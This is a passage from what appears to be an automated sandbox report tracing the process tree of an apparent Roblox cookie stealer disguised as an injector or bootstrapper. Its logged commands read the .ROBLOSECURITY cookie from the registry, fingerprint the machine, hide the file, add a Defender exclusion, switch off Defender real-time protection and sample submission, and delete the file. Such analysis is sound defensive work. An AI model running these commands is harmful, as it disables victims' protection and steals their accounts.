        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1092
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2060
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        6⤵
        
        PID:3032
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        6⤵
        
        PID:1792
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:916
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1984
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:3644
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1452
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2344
    - - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        5⤵
        Executes dropped EXE
        
        PID:676
    - - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        5⤵
        
        PID:4016
      - C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        6⤵
        Executes dropped EXE
        
        PID:2936
      - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        6⤵
        Executes dropped EXE
        
        PID:1220
      - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        6⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        7⤵
        Executes dropped EXE
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        7⤵
        Executes dropped EXE
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        7⤵
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        8⤵
        Executes dropped EXE
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        8⤵
        Executes dropped EXE
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        8⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        9⤵
        Executes dropped EXE
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        9⤵
        Executes dropped EXE
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        9⤵
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        10⤵
        Executes dropped EXE
        
        PID:2036
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        10⤵
        Executes dropped EXE
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        10⤵
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        11⤵
        Executes dropped EXE
        
        PID:3388
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        11⤵
        Executes dropped EXE
        
        PID:4784
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        11⤵
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        12⤵
        Executes dropped EXE
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        12⤵
        Executes dropped EXE
        
        PID:4584
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        12⤵
        
        PID:2632
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        13⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3164
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:2300
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        14⤵
        Views/modifies file attributes
        
        PID:352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        14⤵
        
        PID:3476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        14⤵
        
        PID:3388
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        14⤵
        
        PID:4804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        14⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4384
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        14⤵
        Detects videocard installed
        
        PID:1240
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:132
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2944
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        13⤵
        Executes dropped EXE
        
        PID:4820
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        13⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        14⤵
        Executes dropped EXE
        
        PID:2804
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        14⤵
        Executes dropped EXE
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        14⤵
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        15⤵
        Executes dropped EXE
        
        PID:476
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        15⤵
        Executes dropped EXE
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        15⤵
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        16⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:688
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        17⤵
        Views/modifies file attributes
        
        PID:4220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:2688
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:4292
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:3184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:352
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1104
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        16⤵
        Executes dropped EXE
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        16⤵
        
        PID:1448
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        17⤵
        Executes dropped EXE
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        17⤵
        Executes dropped EXE
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        17⤵
        
        PID:2880
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        18⤵
        Executes dropped EXE
        
        PID:1664
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        18⤵
        Executes dropped EXE
        
        PID:3980
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        18⤵
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        19⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2400
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:4652
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        20⤵
        Views/modifies file attributes
        
        PID:3736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        20⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        20⤵
        
        PID:3208
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        20⤵
        
        PID:1504
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:5112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        20⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3316
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        20⤵
        Detects videocard installed
        
        PID:4928
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4796
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3524
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        19⤵
        Executes dropped EXE
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        19⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        20⤵
        Executes dropped EXE
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        20⤵
        Executes dropped EXE
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        20⤵
        
        PID:1160
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        21⤵
        Executes dropped EXE
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        21⤵
        Executes dropped EXE
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        21⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        22⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:1848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:2028
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        23⤵
        Views/modifies file attributes
        
        PID:788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:2040
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:1900
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:4916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:3012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        
        PID:2600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:3204
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2592
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1140
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        22⤵
        Executes dropped EXE
        
        PID:1868
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        22⤵
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        23⤵
        Executes dropped EXE
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        23⤵
        Executes dropped EXE
        
        PID:2716
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        23⤵
        
        PID:2432
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        24⤵
        Executes dropped EXE
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        24⤵
        Executes dropped EXE
        
        PID:3836
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        24⤵
        
        PID:4356
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        25⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:956
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:3100
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        26⤵
        Views/modifies file attributes
        
        PID:3348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        26⤵
        
        PID:3212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        26⤵
        
        PID:1792
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        26⤵
        
        PID:2212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        26⤵
        
        PID:1176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3292
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        26⤵
        Detects videocard installed
        
        PID:3464
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
        26⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4592
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        27⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        25⤵
        Executes dropped EXE
        
        PID:788
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        25⤵
        
        PID:3740
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        26⤵
        Executes dropped EXE
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        26⤵
        Executes dropped EXE
        
        PID:708
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        26⤵
        
        PID:704
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        27⤵
        Executes dropped EXE
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
        27⤵
        Executes dropped EXE
        
        PID:4412
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
        27⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        28⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:4016
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        29⤵
        Views/modifies file attributes
        
        PID:4464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
